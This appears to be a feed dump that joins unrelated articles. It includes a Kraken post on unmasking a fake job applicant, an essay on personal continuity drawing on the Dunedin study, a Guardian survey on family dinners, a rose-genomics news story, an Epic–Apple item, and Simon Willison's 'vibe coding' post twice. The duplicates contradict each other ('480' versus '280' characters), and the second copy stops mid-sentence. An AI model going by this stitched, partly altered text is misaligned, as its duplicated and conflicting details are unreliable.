This meant that our team had uncovered a hacking operation where one individual had established multiple identities to apply for roles in the crypto space and beyond. Several of the names had previously been hired by multiple companies, as our team identified work-related email addresses linked to them. One identity in this network was also a known foreign agent on the sanctions list.
As our team dug deeper into the candidate’s history and credentials, technical inconsistencies emerged:
The candidate used remote colocated Mac desktops but interacted with other components through a VPN, a setup commonly deployed to hide location and network activity.
Their resume was linked to a GitHub profile containing an email address exposed in a past data breach.
The candidate’s primary form of ID appeared to be altered, likely using details stolen in an identity theft case two years prior.
By this point, the evidence was clear, and our team was confident this wasn’t just a suspicious job applicant, but a state-sponsored infiltration attempt.
Turning the tables – how our team responded
Instead of tipping off the applicant, our security and recruitment teams strategically advanced them through our rigorous recruitment process – not to hire, but to study their approach. This meant putting them through multiple rounds of technical infosec tests and verification tasks, designed to extract key details about their identity and tactics.
The final round interview? A casual chemistry interview with Kraken’s Chief Security Officer (CSO) Nick Percoco and several other team members. What the candidate didn’t realize was that this was a trap – a subtle but deliberate test of their identity.
Between standard interview questions, our team slipped in two-factor authentication prompts, such as asking the candidate to verify their location, hold up a government-issued ID, and even recommend some local restaurants in the city they claimed to be in.
At this point, the candidate unraveled. Flustered and caught off guard, they struggled with the basic verification tests, and couldn’t convincingly answer real-time questions about their city of residence or country of citizenship. By the end of the interview, the truth was clear: this was not a legitimate applicant, but an imposter attempting to infiltrate our systems.
Commenting on the events, CSO Nick Percoco, said:
“Don’t trust, verify. This core crypto principle is more relevant than ever in the digital age. State-sponsored attacks aren’t just a crypto, or U.S. corporate, issue – they’re a global threat. Any individual or business handling value is a target, and resilience starts with operationally preparing to withstand these types of attacks.”
Key takeaways
Not all attackers break in, some try to walk through the front door. As cyber threats evolve, so must our security strategies. A holistic, proactive approach is critical to protect an organization.
Generative AI is making deception easier, but isn’t foolproof. Attackers can trick parts of the hiring process, like a technical assessment, but genuine candidates will usually pass real-time, unprompted verification tests. Try to avoid patterns in the types of verification questions that hiring managers use.
A culture of productive paranoia is key. Security isn’t just an IT responsibility. In the modern era, it’s an organizational mindset. By actively engaging this individual, we identified areas to strengthen our defenses against future infiltration attempts.
The next time a suspicious job application comes through, remember: sometimes, the biggest threats come disguised as opportunities.
I have few memories of being four—a fact I find disconcerting now that I’m the father of a four-year-old. My son and I have great times together; lately, we’ve been building Lego versions of familiar places (the coffee shop, the bathroom) and perfecting the “flipperoo,” a move in which I hold his hands while he somersaults backward from my shoulders to the ground. But how much of our joyous life will he remember? What I recall from when I was four are the red-painted nails of a mean babysitter; the brushed-silver stereo in my parents’ apartment; a particular orange-carpeted hallway; some houseplants in the sun; and a glimpse of my father’s face, perhaps smuggled into memory from a photograph. These disconnected images don’t knit together into a picture of a life. They also fail to illuminate any inner reality. I have no memories of my own feelings, thoughts, or personality; I’m told that I was a cheerful, talkative child given to long dinner-table speeches, but don’t remember being so. My son, who is happy and voluble, is so much fun to be around that I sometimes mourn, on his behalf, his future inability to remember himself.
If we could see our childish selves more clearly, we might have a better sense of the course and the character of our lives. Are we the same people at four that we will be at twenty-four, forty-four, or seventy-four? Or will we change substantially through time? Is the fix already in, or will our stories have surprising twists and turns? Some people feel that they’ve altered profoundly through the years, and to them the past seems like a foreign country, characterized by peculiar customs, values, and tastes. (Those boyfriends! That music! Those outfits!) But others have a strong sense of connection with their younger selves, and for them the past remains a home. My mother-in-law, who lives not far from her parents’ house in the same town where she grew up, insists that she is the same as she’s always been, and recalls with fresh indignation her sixth birthday, when she was promised a pony but didn’t get one. Her brother holds the opposite view: he looks back on several distinct epochs in his life, each with its own set of attitudes, circumstances, and friends. “I’ve walked through many doorways,” he’s told me. I feel this way, too, although most people who know me well say that I’ve been the same person forever.
Try to remember life as you lived it years ago, on a typical day in the fall. Back then, you cared deeply about certain things (a girlfriend? Depeche Mode?) but were oblivious of others (your political commitments? your children?). Certain key events—college? war? marriage? Alcoholics Anonymous?—hadn’t yet occurred. Does the self you remember feel like you, or like a stranger? Do you seem to be remembering yesterday, or reading a novel about a fictional character?
If you have the former feelings, you’re probably a continuer; if the latter, you’re probably a divider. You might prefer being one to the other, but find it hard to shift your perspective. In the poem “The Rainbow,” William Wordsworth wrote that “the Child is Father of the Man,” and this motto is often quoted as truth. But he couched the idea as an aspiration—“And I could wish my days to be / Bound each to each by natural piety”—as if to say that, though it would be nice if our childhoods and adulthoods were connected like the ends of a rainbow, the connection could be an illusion that depends on where we stand. One reason to go to a high-school reunion is to feel like one’s past self—old friendships resume, old in-jokes resurface, old crushes reignite. But the time travel ceases when you step out of the gym. It turns out that you’ve changed, after all.
On the other hand, some of us want to disconnect from our past selves; burdened by who we used to be or caged by who we are, we wish for multipart lives. In the voluminous autobiographical novel “My Struggle,” Karl Ove Knausgaard—a middle-aged man who hopes to be better today than he was as a young man—questions whether it even makes sense to use the same name over a lifetime. Looking at a photograph of himself as an infant, he wonders what that little person, with “arms and legs spread, and a face distorted into a scream,” really has to do with the forty-year-old father and writer he is now, or with “the gray, hunched geriatric who in forty years from now might be sitting dribbling and trembling in an old people’s home.” It might be better, he suggests, to adopt a series of names: “The fetus might be called Jens Ove, for example, and the infant Nils Ove . . . the ten- to twelve-year-old Geir Ove, the twelve- to seventeen-year-old Kurt Ove . . . the twenty-three- to thirty-two-year-old Tor Ove, the thirty-two- to forty-six-year-old Karl Ove—and so on.” In such a scheme, “the first name would represent the distinctiveness of the age range, the middle name would represent continuity, and the last, family affiliation.”
My son’s name is Peter. It unnerves me to think that he could someday become so different as to warrant a new name. But he learns and grows each day; how could he not be always becoming someone new? I have duelling aspirations for him: keep growing; keep being you. As for how he’ll see himself, who knows? The philosopher Galen Strawson believes that some people are simply more “episodic” than others; they’re fine living day to day, without regard to the broader plot arc. “I’m somewhere down towards the episodic end of this spectrum,” Strawson writes in an essay called “The Sense of the Self.” “I have no sense of my life as a narrative with form, and little interest in my own past.”
Perhaps Peter will grow up to be an episodic person who lives in the moment, unconcerned with whether his life forms a whole or a collection of parts. Even so, there will be no escaping the paradoxes of mutability, which have a way of weaving themselves into our lives. Thinking of some old shameful act of ours, we tell ourselves, “I’ve changed!” (But have we?) Bored with a friend who’s obsessed with what happened long ago, we say, “That was another life—you’re a different person now!” (But is she?) Living alongside our friends, spouses, parents, and children, we wonder if they’re the same people we’ve always known, or if they’ve lived through changes we, or they, struggle to see. Even as we work tirelessly to improve, we find that, wherever we go, there we are (in which case what’s the point?). And yet sometimes we recall our former selves with a sense of wonder, as if remembering a past life. Lives are long, and hard to see. What can we learn by asking if we’ve always been who we are?
The question of our continuity has an empirical side that can be answered scientifically. In the nineteen-seventies, while working at the University of Otago, in New Zealand, a psychologist named Phil Silva helped launch a study of a thousand and thirty-seven children; the subjects, all of whom lived in or around the city of Dunedin, were studied at age three, and again at five, seven, nine, eleven, thirteen, fifteen, eighteen, twenty-one, twenty-six, thirty-two, thirty-eight, and forty-five, by researchers who often interviewed not just the subjects but also their family and friends. In 2020, four psychologists associated with the Dunedin study—Jay Belsky, Avshalom Caspi, Terrie E. Moffitt, and Richie Poulton—summarized what’s been learned so far in a book called “The Origins of You: How Childhood Shapes Later Life.” It folds in results from a few related studies conducted in the United States and the United Kingdom, and so describes how about four thousand people have changed through the decades.
John Stuart Mill once wrote that a young person is like “a tree, which requires to grow and develop itself on all sides, according to the tendency of the inward forces which make it a living thing.” The image suggests a generalized spreading out and reaching up, which is bound to be affected by soil and climate, and might be aided by a little judicious pruning here and there. The authors of “The Origins of You” offer a more chaotic metaphor. Human beings, they suggest, are like storm systems. Each individual storm has its own particular set of traits and dynamics; meanwhile, its future depends on numerous elements of atmosphere and landscape. The fate of any given Harvey, Allison, Ike, or Katrina might be shaped, in part, by “air pressure in another locale,” and by “the time that the hurricane spends out at sea, picking up moisture, before making landfall.” Donald Trump, in 2014, told a biographer that he was the same person in his sixties that he’d been as a first grader. In his case, the researchers write, the idea isn’t so hard to believe. Storms, however, are shaped by the world and by other storms, and only an egomaniacal weather system believes in its absolute and unchanging individuality.
Efforts to understand human weather—to show, for example, that children who are abused bear the mark of that abuse as adults—are predictably inexact. One problem is that many studies of development are “retrospective” in nature: researchers start with how people are doing now, then look to the past to find out how they got that way. But many issues trouble such efforts. There’s the fallibility of memory: people often have difficulty recalling even basic facts about what they lived through decades earlier. (Many parents, for instance, can’t accurately remember whether a child was diagnosed as having A.D.H.D.; people even have trouble remembering whether their parents were mean or nice.) There’s also the problem of enrollment bias. A retrospective study of anxious adults might find that many of them grew up with divorced parents—but what about the many children of divorce who didn’t develop anxiety, and so were never enrolled in the study? It’s hard for a retrospective study to establish the true import of any single factor. The value of the Dunedin project, therefore, derives not just from its long duration but also from the fact that it is “prospective.” It began with a thousand random children, and only later identified changes as they emerged.
Working prospectively, the Dunedin researchers began by categorizing their three-year-olds. They met with the children for ninety minutes each, rating them on twenty-two aspects of personality—restlessness, impulsivity, willfulness, attentiveness, friendliness, communicativeness, and so on. They then used their results to identify five general types of children. Forty per cent of the kids were deemed “well-adjusted,” with the usual mixture of kid personality traits. Another quarter were found to be “confident”—more than usually comfortable with strangers and new situations. Fifteen per cent were “reserved,” or standoffish, at first. About one in ten turned out to be “inhibited”; the same proportion were identified as “undercontrolled.” The inhibited kids were notably shy and exceptionally slow to warm up; the undercontrolled ones were impulsive and ornery. These determinations of personality, arrived at after brief encounters and by strangers, would form the basis for a half century of further work.
By age eighteen, certain patterns were visible. Although the confident, reserved, and well-adjusted children continued to be that way, those categories were less distinct. In contrast, the kids who’d been categorized as inhibited or as undercontrolled had stayed truer to themselves. At age eighteen, the once inhibited kids remained a little apart, and were “significantly less forceful and decisive than all the other children.” The undercontrolled kids, meanwhile, “described themselves as danger seeking and impulsive,” and were “the least likely of all young adults to avoid harmful, exciting, and dangerous situations or to behave in reflective, cautious, careful, or planful ways.” Teen-agers in this last group tended to get angry more often, and to see themselves “as mistreated and victimized.”
The researchers saw an opportunity to streamline their categories. They lumped together the large group of teen-agers who didn’t seem to be on a set path. Then they focussed on two smaller groups that stood out. One group was “moving away from the world,” embracing a way of life that, though it could be perfectly rewarding, was also low-key and circumspect. And another, similarly sized group was “moving against the world.” In subsequent years, the researchers found that people in the latter group were more likely to get fired from their jobs and to have gambling problems. Their dispositions were durable.
That durability is due, in part, to the social power of temperament, which, the authors write, is “a machine that designs another machine, which goes on to influence development.” This second machine is a person’s social environment. Someone who moves against the world will push others away, and he’ll tend to interpret the actions of even well-meaning others as pushing back; this negative social feedback will deepen his oppositional stance. Meanwhile, he’ll engage in what psychologists call “niche picking”—the favoring of social situations that reinforce one’s disposition. A “well-adjusted” fifth grader might actually “look forward to the transition to middle school”; when she gets there, she might even join some clubs. Her friend who’s moving away from the world might prefer to read at lunch. And her brother, who’s moving against the world—the group skews slightly male—will feel most at home in dangerous situations.
Through such self-development, the authors write, we curate lives that make us ever more like ourselves. But there are ways to break out of the cycle. One way in which people change course is through their intimate relationships. The Dunedin study suggests that, if someone who tends to move against the world marries the right person, or finds the right mentor, he might begin to move in a more positive direction. His world will have become a more beneficent co-creation. Even if much of the story is written, a rewrite is always possible.
The Dunedin study tells us a lot about how differences between children matter over time. But how much can this kind of work reveal about the deeper, more personal question of our own continuity or changeability? That depends on what we mean when we ask who we are. We are, after all, more than our dispositions. All of us fit into any number of categories, but those categories don’t fully encompass our identities.
There’s an important sense, first of all, in which who you are is determined not by what you’re like but by what you do. Imagine two brothers who grow up sharing a bedroom, and who have similar personalities—intelligent, tough, commanding, and ambitious. One becomes a state senator and university president, while the other becomes a Mob boss. Do their parallel temperaments make them similar people? Those who’ve followed the stories of William Bulger and James (Whitey) Bulger—the Boston brothers who ran the Massachusetts Senate and the underworld, respectively—sometimes suggest that they were more alike than different. (“They’re both very tough in their respective fields,” a biographer observed.) But we’d be right to be skeptical of such an outlook, because it requires setting aside the wildly different substances of the brothers’ lives. At the Pearly Gates, no one will get them confused.
“He’s more interesting poolside.” (Cartoon by Liza Donnelly)
The Bulger brothers are extraordinary; few of us break so bad or good. But we all do surprising things that matter. In 1964, the director Michael Apted helped make “Seven Up!,” the first of a series of documentaries that would visit the same group of a dozen or so Britons every seven years, starting at age seven; Apted envisioned the project—which was updated most recently in 2019, with “63 Up”—as a socioeconomic inquiry “about these kids who have it all, and these other kids who have nothing.” But, as the series has progressed, the chaos of individuality has encroached on the clarity of categorization. One participant has become a lay minister and gone into politics; another has begun helping orphans in Bulgaria; others have done amateur theatre, studied nuclear fusion, and started rock bands. One turned into a documentarian himself and quit the project. Real life, irrepressible in its particulars, has overpowered the schematic intentions of the filmmakers.
Even seemingly unimportant or trivial elements can contribute to who we are. Late this summer, I attended a family function with my father and my uncle. As we sat at an outside table, making small talk, our conversation turned to “Star Trek,” the sci-fi TV show that premièred in 1966. My father and uncle have both watched various incarnations of it since childhood, and my dad, in particular, is a genuine fan. While the party went on around us, we all recited from memory the original version’s opening monologue—“Space: the final frontier. These are the voyages of the Starship Enterprise. . . .”—and applauded ourselves on our rendition. “Star Trek” is a through line in my dad’s life. We tend to downplay these sorts of quirks and enthusiasms, but they’re important to who we are. When Leopold Bloom, the protagonist of James Joyce’s “Ulysses,” wanders through a Dublin cemetery, he is unimpressed by the generic inscriptions on the gravestones, and thinks they should be more specific. “So and So, wheelwright,” Bloom imagines, or, on a stone engraved with a saucepan, “I cooked good Irish stew.” Asked to describe ourselves, we might tend to talk in general terms, finding the details of our lives somehow embarrassing. But a friend delivering a eulogy would do well to note that we played guitar, collected antique telephones, and loved Agatha Christie and the Mets. Each assemblage of details is like a fingerprint. Some of us have had the same prints throughout our lives; others have had a few sets.
Focussing on the actualities of our lives might belie our intuitions about our own continuity or changeability. Galen Strawson, the philosopher who says that he has little sense of his life “as a narrative,” is best known for the arguments he’s made against the ideas of free will and moral responsibility; he maintains that we don’t have free will and aren’t ultimately responsible for what we do. But his father, Peter Strawson, was also a philosopher, and was famous for, among other things, defending those concepts. Galen Strawson can assure us that, from a first-person perspective, his life feels “episodic.” Yet, from the third-person perspective of an imagined biographer, he’s part of a long plot arc that stretches across lifetimes. We may feel discontinuous on the inside but be continuous on the outside, and vice versa. That sort of divergence may simply be unavoidable. Every life can probably be viewed from two angles.
I know two Tims, and they have opposing intuitions about their own continuities. The first Tim, my father-in-law, is sure that he’s had the same jovially jousting personality from two to seventy-two. He’s also had the same interests—reading, the Second World War, Ireland, the Wild West, the Yankees—for most of his life. He is one of the most self-consistent people I know. The second Tim, my high-school friend, sees his life as radically discontinuous, and rightly so. When I first met him, he was so skinny that he was turned away from a blood drive for being underweight; bullied and pushed around by bigger kids, he took solace in the idea that his parents were late growers. This notion struck his friends as far-fetched. But after high school Tim suddenly transformed into a towering man with an action-hero physique. He studied physics and philosophy in college, and then worked in a neuroscience lab before becoming an officer in the Marines and going to Iraq; he entered finance, but has since left to study computer science.
“I’ve changed more than most people I know,” Tim told me. He shared a vivid memory of a conversation he had with his mother, while they sat in the car outside an auto mechanic’s: “I was thirteen, and we were talking about how people change. And my mom, who’s a psychiatrist, told me that people tend to stop changing so much when they get into their thirties. They start to accept who they are, and to live with themselves as they are. And, maybe because I was an unhappy and angry person at the time, I found that idea offensive. And I vowed right then that I would never stop changing. And I haven’t stopped.”
Do the two Tims have the whole picture? I’ve known my father-in-law for only twenty of his seventy-two years, but even in that time he’s changed quite a bit, becoming more patient and compassionate; by all accounts, the life he lived before I met him had a few chapters of its own, too. And there’s a fundamental sense in which my high-school friend hasn’t changed. For as long as I’ve known him, he’s been committed to the idea of becoming different. For him, true transformation would require settling down; endless change is a kind of consistency.
Galen Strawson notes that there’s a wide range of ways in which people can relate to time in their lives. “Some people live in narrative mode,” he writes, and others have “no tendency to see their life as constituting a story or development.” But it’s not just a matter of being a continuer or a divider. Some people live episodically as a form of “spiritual discipline,” while others are “simply aimless.” Presentism can “be a response to economic destitution—a devastating lack of opportunities—or vast wealth.” He continues:
There are lotus-eaters, drifters, lilies of the field, mystics and people who work hard in the present moment. . . . Some people are creative although they lack ambition or long-term aims, and go from one small thing to the next, or produce large works without planning to, by accident or accretion. Some people are very consistent in character, whether or not they know it, a form of steadiness that may underwrite experience of the self’s continuity. Others are consistent in their inconsistency, and feel themselves to be continually puzzling and piecemeal.
The stories we tell ourselves about whether we’ve changed are bound to be simpler than the elusive reality. But that’s not to say that they’re inert. My friend Tim’s story, in which he vows to change forever, shows how such stories can be laden with value. Whether you perceive stasis or segmentation is almost an ideological question. To be changeable is to be unpredictable and free; it’s to be not just the protagonist of your life story but the author of its plot. In some cases, it means embracing a drama of vulnerability, decision, and transformation; it may also involve a refusal to accept the finitude that’s the flip side of individuality.
The alternative perspective—that you’ve always been who you are—bears values, too. James Fenton captures some of them in his poem “The Ideal”:
A self is a self.
It is not a screen.
A person should respect
What he has been.
This is my past
Which I shall not discard.
This is the ideal.
This is hard.
In this view, life is full and variable, and we all go through adventures that may change who we are. But what matters most is that we lived it. The same me, however altered, absorbed it all and did it all. This outlook also involves a declaration of independence—independence not from one’s past self and circumstances but from the power of circumstances and the choices we make to give meaning to our lives. Dividers tell the story of how they’ve renovated their houses, becoming architects along the way. Continuers tell the story of an august property that will remain itself regardless of what gets built. As different as these two views sound, they have a lot in common. Among other things, they aid us in our self-development. By committing himself to a life of change, my friend Tim might have sped it along. By concentrating on his persistence of character, my father-in-law may have nurtured and refined his best self.
The passage of time almost demands that we tell some sort of story: there are certain ways in which we can’t help changing through life, and we must respond to them. Young bodies differ from old ones; possibilities multiply in our early decades, and later fade. When you were seventeen, you practiced the piano for an hour each day, and fell in love for the first time; now you pay down your credit cards and watch Amazon Prime. To say that you are the same person today that you were decades ago is absurd. A story that neatly divides your past into chapters may also be artificial. And yet there’s value in imposing order on chaos. It’s not just a matter of self-soothing: the future looms, and we must decide how to act based on the past. You can’t continue a story without first writing one.
Sticking with any single account of your mutability may be limiting. The stories we’ve told may become too narrow for our needs. In the book “Life Is Hard,” the philosopher Kieran Setiya argues that certain bracing challenges—loneliness, failure, ill health, grief, and so on—are essentially unavoidable; we tend to be educated, meanwhile, in a broadly redemptive tradition that “urges us to focus on the best in life.” One of the benefits of asserting that we’ve always been who we are is that it helps us gloss over the disruptive developments that have upended our lives. But it’s good, the book shows, to acknowledge hard experiences and ask how they’ve helped us grow tougher, kinder, and wiser. More generally, if you’ve long answered the question of continuity one way, you might try answering it another. For a change, see yourself as either more continuous or less continuous than you’d assumed. Find out what this new perspective reveals.
There’s a recursive quality to acts of self-narration. I tell myself a story about myself in order to synchronize myself with the tale I’m telling; then, inevitably, I revise the story as I change. The long work of revising might itself be a source of continuity in our lives. One of the participants in the “Up” series tells Apted, “It’s taken me virtually sixty years to understand who I am.” Martin Heidegger, the often impenetrable German philosopher, argued that what distinguishes human beings is our ability to “take a stand” on what and who we are; in fact, we have no choice but to ask unceasing questions about what it means to exist, and about what it all adds up to. The asking, and trying out of answers, is as fundamental to our personhood as growing is to a tree.
Recently, my son has started to understand that he’s changing. He’s noticed that he no longer fits into a favorite shirt, and he shows me how he sleeps somewhat diagonally in his toddler bed. He’s been caught walking around the house with real scissors. “I’m a big kid now, and I can use these,” he says. Passing a favorite spot on the beach, he tells me, “Remember when we used to play with trucks here? I loved those times.” By this point, he’s actually had a few different names: we called him “little guy” after he was born, and I now call him “Mr. Man.” His understanding of his own growth is a step in his growing, and he is, increasingly, a doubled being—a tree and a vine. As the tree grows, the vine twines, finding new holds on the shape that supports it. It’s a process that will continue throughout his life. We change, and change our view of that change, for as long as we live. ♦
Just one in three British families eat together each day, survey finds
Guardian
www.theguardian.com
2025-05-01 15:43:55
Phones dominate dining tables as parents struggle for conversation, research for The Week Junior reveals A quarter of British families no longer talk at dinner, with most bringing their phones to the table and 42% of parents saying they struggle to find a topic of conversation, a survey of 2,000 hou...
A quarter of British families no longer talk at dinner, with most bringing their phones to the table and 42% of parents saying they struggle to find a topic of conversation, a survey of 2,000 households shows.
It found that just one in three families sit down to eat together every day and conversations are increasingly being replaced by scrolling and screens.
Two-thirds (66%) of children aged eight to 16 said they would rather eat in front of a TV or computer than with a parent, and 51% said they actively used their devices while eating.
However, it is not just young people who are increasingly being drawn towards their screens – 39% of children said they had to ask their parents to put down their phones at the table.
Commissioned by The Week Junior, a weekly news magazine for children, the research found that a reluctance to discuss current events was part of the reason why dinner-table conversation had fizzled out.
More than 70% of parents said they struggled to discuss the news with their children and 42% found it difficult to come up with a topic of conversation altogether.
In its latest edition, the magazine published a set of conversation cues for parents and children, such as: “If you were in charge of the country, what would you do?” and: “What’s one thing you would like to know more about?”
Vanessa Harriss, editor of The Week Junior, said: “In our fast-paced daily lives, being able to spend time together as a family can be a challenge and the digital distractions are ever more insistent.
“Whether it’s chatting about everyday things or discussing what’s going on in the news, family conversations boost children’s development and their wellbeing.”
The research found that despite worrying signs dinner-time conversation was dying out, children and parents were keen to bring it back. Of the children surveyed, 82% said they wanted dinner to be a special time set aside exclusively for conversation with their parents.
The majority said they enjoyed discussing a range of topics, from global affairs to playground drama, and 83% said they preferred having these conversations with their parents face to face at the table, rather than over the phone.
Of the parents, 93% said they would more consistently enforce dinner table rules if it helped their children’s development and 94% said they learned something from their children in two-way discussions.
Dr Elizabeth Kilbey, an author and child psychologist, said: “These simple, daily interactions can make a significant impact, not just in strengthening family ties but in cultivating a generation equipped to lead empathetically and thoughtfully.”
This year’s World Happiness Report examined the link between eating together and wellbeing for the first time. It found that dining alone was becoming more prevalent, especially among young people, but those who shared more meals with others reported significantly higher levels of life satisfaction and social support.
Two publishers and three authors fail to understand what "vibe coding" means
Vibe coding does not mean “using AI tools to help write code”. It means “generating code with AI without caring about the code that is produced”. See Not all AI-assisted programming is vibe coding for my previous writing on this subject. This is a hill I am willing to die on. I fear it will be the death of me.
I just learned about not one but two forthcoming books that use vibe coding in the title and abuse that very clear definition!
Vibe Coding by Gene Kim and Steve Yegge (published by IT Revolution) carries the subtitle “Building Production-Grade Software With GenAI, Chat, Agents, and Beyond”—exactly what vibe coding is not. Vibe Coding: The Future of Programming by Addy Osmani (published by O’Reilly Media) likewise talks about how professional engineers can integrate AI-assisted coding tools into their workflow.
I fear it may be too late for these authors and publishers to fix their embarrassing mistakes: they’ve already designed the cover art!
I wonder if this is a new record for the time from a term being coined to the first published books that use that term entirely incorrectly.
Vibe coding was only coined by Andrej Karpathy on February 6th, 84 days ago. I will once again quote Andrej’s tweet, with my own highlights for emphasis:
There’s a new kind of coding I call “vibe coding”, where you fully give in to the vibes, embrace exponentials, and forget that the code even exists. It’s possible because the LLMs (e.g. Cursor Composer w Sonnet) are getting too good. Also I just talk to Composer with SuperWhisper so I barely even touch the keyboard.
I ask for the dumbest things like “decrease the padding on the sidebar by half” because I’m too lazy to find it. I “Accept All” always, I don’t read the diffs anymore. When I get error messages I just copy paste them in with no comment, usually that fixes it. The code grows beyond my usual comprehension, I’d have to really read through it for a while. Sometimes the LLMs can’t fix a bug so I just work around it or ask for random changes until it goes away.
It’s not too bad for throwaway weekend projects, but still quite amusing. I’m building a project or webapp, but it’s not really coding—I just see stuff, say stuff, run stuff, and copy paste stuff, and it mostly works.
Andrej could not have stated this more clearly: vibe coding is when you forget that the code even exists, as a fun way to build throwaway projects. It’s not the same thing as using LLM tools as part of your process for responsibly building production code.
I know it’s harder now that tweets are longer than 480 characters, but it’s vitally important you read to the end of the tweet before publishing a book about something!
Now what do we call books about real vibe coding?
This is the aspect of this whole thing that most disappoints me.
I think there is a real need for a book on actual vibe coding: helping people who are not software developers—and who don’t want to become developers—learn how to use vibe coding techniques safely, effectively and responsibly to solve their problems.
This is a rich, deep topic! Most of the population of the world are never going to learn to code, but thanks to vibe coding tools those people now have a path to building custom software.
Everyone deserves the right to automate tedious things in their lives with a computer. They shouldn’t have to learn programming in order to do that.
That is who vibe coding is for. It’s not for people who are software engineers already!
There are so many questions to be answered here. What kind of projects can be built in this way? How can you avoid the traps around security, privacy, reliability and a risk of over-spending? How can you navigate the jagged frontier of things that can be achieved in this way versus things that are completely impossible?
A book for people like that could be a genuine bestseller! But because three authors and the staff of two publishers didn’t read to the end of the tweet we now need to find a new buzzy term for that, despite having the perfect term for it already.
I’d like the publishers and authors responsible to at least understand how much potential value—in terms of both helping out more people and making more money—they have left on the table because they didn’t read all the way to the end of the tweet.
The ancestor of roses could have had yellow, unspotted petals and leaves with seven leaflets. Credit: Anna Shvets: https://www.pexels.com/photo/person-holding-white-roses-bouquet-5894037/
Red roses, the symbol of love, were likely yellow in the past, indicates
a large genomic analysis
by researchers from Beijing Forestry University, China. Roses of all colors, including white, red, pink, and peach, belong to the genus Rosa, which is a member of the Rosaceae family.
Reconstructing the ancestral traits through genomic analysis revealed that all the roses trace back to a
common ancestor
—a single-petal flower with yellow color and seven leaflets.
The findings are published in
Nature Plants
.
Accounting for almost 30% of cut flower market sales, roses are the most widely cultivated ornamental plants and have been successfully domesticated to reflect the aesthetic preferences of each era.
It all began with the rose breeding renaissance in the 1700s, marked by the crossing of ancient wild Chinese roses and old European cultivars—plants selectively bred through human intervention to develop desirable characteristics.
Currently, we have 150 to 200 species of roses and more than 35,000 cultivars, displaying a wide range of blooming frequencies, fragrances, and colors. However, global climate change has prompted rose breeders to shift their focus from purely cosmetic traits to breeding rose varieties that are more resistant to stress factors like drought and disease, and easier to care for.
Borrowing genetic resources from wild rose varieties, which offer valuable traits such as fragrance and
disease resistance
, presents a promising strategy for breeding resilient, low-maintenance rose cultivars.
Genome sequencing of 205 samples representing 84 species reveals the evolutionary and geographical history of the Rosa genus. Credit:
Nature Plants
(2025). DOI: 10.1038/s41477-025-01955-5
A clear understanding of the origin and evolution of the Rosa genus, both wild and cultivated varieties, can not only advance the breeding efforts but also aid in the conservation of near-threatened rose varieties.
With this in mind, the researchers collected 205 samples of over 80 Rosa species, covering 84% of what is documented in the "Flora of China."
The samples were then analyzed using genomic sequencing,
population genetics
, and other methods to trace back their ancestral traits. They studied 707 single-copy genes and uncovered a set of conserved
genetic markers
like single-nucleotide polymorphisms—the most common type of genetic variation found in DNA—which helped them chart the evolutionary and geographical history of the rose species and the connections between them.
Ancestral trait reconstruction showed that the shared ancestor of the studied samples was a yellow flower with a single row of petals and leaves divided into seven leaflets. As roses evolved and were domesticated, they developed new colors, distinct petal markings, and the ability to bloom in clusters.
The study also brought new insight into the widely accepted notion that the Rosa genus originated in Central Asia. The
genetic evidence
pointed to two major centers of
rose
diversity in China—one in the dry northwest, where yellow roses with small leaves grow, and another in the warm and humid southwest, where the white, fragrant variety thrives.
The researchers highlight that these findings provide a strong foundation for utilizing wild Rosa resources, which could assist in the re-domestication and innovative breeding of modern roses.
More information:
Bixuan Cheng et al, Phenotypic and genomic signatures across wild Rosa species open new horizons for modern rose breeding,
Nature Plants
(2025).
DOI: 10.1038/s41477-025-01955-5
Citation
:
Red, pink or white, all roses were once yellow says genomic analysis (2025, April 18)
retrieved 1 May 2025
from https://phys.org/news/2025-04-red-pink-white-roses-yellow.html
Apple Lost But That Doesn’t Mean Epic Won Anything
Daring Fireball
www.theverge.com
2025-05-01 15:30:09
Jay Peters, The Verge, under the headline “Epic Says Fortnite Is Coming Back to iOS in the US”:
Following a court order that blocks Apple from taking a commission on purchases made outside the App Store, Epic Games CEO Tim Sweeney
says on X
that the company plans to bring
Fortnite
back to iOS in the US “next week.”
The app hasn’t been available on iOS in the US since August 2020, when Apple
kicked it off the App Store
for implementing Epic’s own in-app payment system in violation of Apple’s rules. Since then, Apple and Epic have been embroiled in an ongoing legal battle, including a ruling
more in Apple’s favor in 2021
and today’s ruling that is a major victory for Epic.
Sweeney also offered a “peace proposal” from Epic to Apple in his post on X. “If Apple extends the court’s friction-free, Apple-tax-free framework worldwide, we’ll return
Fortnite
to the App Store worldwide and drop current and future litigation on the topic.”
Apple didn’t immediately reply to a request for comment.
Two publishers and three authors fail to understand what "vibe coding" means
Simon Willison
simonwillison.net
2025-05-01 15:26:35
Vibe coding
does not mean “using AI tools to help write code”. It means “generating code with AI without caring about the code that is produced”. See
Not all AI-assisted programming is vibe coding
for my previous writing on this subject. This is a hill I am willing to die on. I fear it will be the death of me.
I just learned about not one but
two
forthcoming books that use vibe coding in the title and abuse that very clear definition!
Vibe Coding
by Gene Kim and Steve Yegge (published by IT Revolution) carries the subtitle “Building Production-Grade Software With GenAI, Chat, Agents, and Beyond”—exactly what vibe coding is not.
Vibe Coding: The Future of Programming
by Addy Osmani (published by O’Reilly Media) likewise talks about how professional engineers can integrate AI-assisted coding tools into their workflow.
I fear it may be too late for these authors and publishers to fix their embarrassing mistakes: they’ve already designed the cover art!
I wonder if this is a new record for the time from a term being coined to the first published books that use that term entirely incorrectly.
Vibe coding was only coined by Andrej Karpathy on February 6th, 84 days ago. I will once again quote
Andrej’s tweet
, with my own highlights for emphasis:
There’s a new kind of coding I call “vibe coding”, where you fully give in to the vibes, embrace exponentials, and
forget that the code even exists
. It’s possible because the LLMs (e.g. Cursor Composer w Sonnet) are getting too good. Also I just talk to Composer with SuperWhisper so I barely even touch the keyboard.
I ask for the dumbest things like “decrease the padding on the sidebar by half” because I’m too lazy to find it. I “Accept All” always, I don’t read the diffs anymore. When I get error messages I just copy paste them in with no comment, usually that fixes it. The code grows beyond my usual comprehension, I’d have to really read through it for a while. Sometimes the LLMs can’t fix a bug so I just work around it or ask for random changes until it goes away.
It’s not too bad for throwaway weekend projects, but still quite amusing
. I’m building a project or webapp, but it’s not really coding—I just see stuff, say stuff, run stuff, and copy paste stuff, and it mostly works.
Andrej could not have stated this more clearly: vibe coding is when you
forget that the code even exists
, as a fun way to build
throwaway projects
. It’s not the same thing as using LLM tools as part of your process for responsibly building production code.
I know it’s harder now that tweets are longer than 280 characters, but it’s vitally important you
read to the end of the tweet
before publishing a book about something!
Now what do we call books about real vibe coding?
This is the aspect of this whole thing that most disappoints me.
I think there is a real need for a book on
actual
vibe coding: helping people who are
